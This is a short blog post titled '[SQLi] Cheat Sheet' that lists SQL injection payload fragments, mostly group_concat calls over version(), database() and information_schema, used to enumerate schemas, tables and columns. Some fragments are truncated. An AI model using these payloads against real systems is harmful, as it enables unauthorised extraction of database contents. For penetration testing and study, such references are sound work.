group_concat(version(),0x3a,database())
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
Home »
Vulnerability
» [SQLi] Cheat Sheet
[SQLi] Cheat Sheet
Posted by Yoo Mee
Posted on 9:24:00 PM
with No comments
0 comments:
Post a Comment